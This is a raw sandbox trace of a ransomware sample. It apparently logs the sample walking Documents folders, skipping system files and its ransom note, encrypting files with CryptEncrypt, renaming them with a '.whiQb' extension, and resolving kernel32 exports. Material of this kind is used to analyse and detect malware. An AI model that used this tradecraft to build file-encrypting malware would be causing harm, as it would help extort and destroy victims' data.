HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps") returned 105 [0084.587] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps.whiQb") returned 111 [0084.587] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\xno92 a6ppv izrss.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\XNO92 a6pPV izRss.pps.whiQb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\xno92 a6ppv izrss.pps.whiqb"), dwFlags=0x0) returned 1 [0084.587] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.588] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.588] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.588] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd193a000, ftCreationTime.dwHighDateTime=0x1d4d41d, ftLastAccessTime.dwLowDateTime=0xa86e8710, ftLastAccessTime.dwHighDateTime=0x1d4ce48, ftLastWriteTime.dwLowDateTime=0xa86e8710, ftLastWriteTime.dwHighDateTime=0x1d4ce48, nFileSizeHigh=0x0, nFileSizeLow=0x2b1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="XNO92 a6pPV izRss.pps", cAlternateFileName="XNO92A~1.PPS")) returned 0 [0084.588] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0084.588] CloseHandle (hObject=0x438) returned 1 [0084.588] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae87bd40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae87bd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae87bd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.588] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.589] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.589] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.589] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.589] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.589] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.589] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.589] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.589] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.589] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.589] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.589] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0084.589] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\jkbimi8.tmp" [0084.589] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.589] CloseHandle (hObject=0x0) returned 0 [0084.589] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.590] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc64ad0, ftCreationTime.dwHighDateTime=0x1d4cb45, ftLastAccessTime.dwLowDateTime=0x61349d70, ftLastAccessTime.dwHighDateTime=0x1d4cde5, ftLastWriteTime.dwLowDateTime=0x61349d70, ftLastWriteTime.dwHighDateTime=0x1d4cde5, nFileSizeHigh=0x0, nFileSizeLow=0x673f, dwReserved0=0x0, dwReserved1=0x0, cFileName="l16Gl4Lrs.rtf", cAlternateFileName="L16GL4~1.RTF")) returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="DECRYPT-FILES.txt") returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="autorun.inf") returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="boot.ini") returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="desktop.ini") returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="ntuser.dat") returned -1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="iconcache.db") returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="bootsect.bak") returned 1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="ntuser.dat.log") returned -1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="thumbs.db") returned -1 [0084.590] lstrcmpiW (lpString1="l16Gl4Lrs.rtf", lpString2="Bootfont.bin") returned 1 [0084.590] lstrlenW (lpString="l16Gl4Lrs.rtf") returned 13 [0084.590] lstrcmpiW (lpString1="rtf", lpString2="lnk") returned 1 [0084.590] lstrcmpiW (lpString1="rtf", lpString2="exe") returned 1 [0084.590] lstrcmpiW (lpString1="rtf", lpString2="sys") returned -1 [0084.590] lstrcmpiW (lpString1="rtf", lpString2="dll") returned 1 [0084.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.590] lstrlenW (lpString="l16Gl4Lrs.rtf") returned 13 [0084.590] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0084.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="l16Gl4Lrs.rtf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf" [0084.590] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\l16Gl4Lrs.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\l16gl4lrs.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.590] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=26431) returned 1 [0084.590] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.591] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.591] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.591] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.591] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.591] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.591] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.592] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.592] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.593] CloseHandle (hObject=0x43c) returned 1 [0084.593] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.593] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.594] CloseHandle (hObject=0x0) returned 0 [0084.594] CloseHandle (hObject=0x438) returned 1 [0084.594] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.594] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.594] GetTickCount () returned 0x114d9bc [0084.594] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.595] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.595] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.595] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.595] lstrlenA (lpString="kernel32.dll") returned 12 [0084.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.595] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.595] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.595] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.595] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.595] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.595] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.595] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.595] lstrlenA (lpString="ADDATOMA") returned 8 [0084.595] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.596] lstrlenA (lpString="ADDATOMW") returned 8 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.596] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.596] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.596] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.596] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.596] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.596] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.596] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.596] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.596] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.596] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.596] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.596] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.596] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.596] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.596] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.596] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.596] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.596] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.596] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.597] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.597] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.597] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.597] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.597] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.597] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.597] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.597] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.597] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.597] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.597] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.597] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.597] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.597] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.597] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.597] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.597] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.597] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.597] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.598] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.598] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.598] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.598] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.598] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.598] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.598] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.598] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.598] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.598] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.598] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.598] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.598] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.598] lstrlenA (lpString="BEEP") returned 4 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.598] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.598] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.598] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.598] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.598] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.598] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.599] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.599] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.599] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.599] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.599] lstrlenA 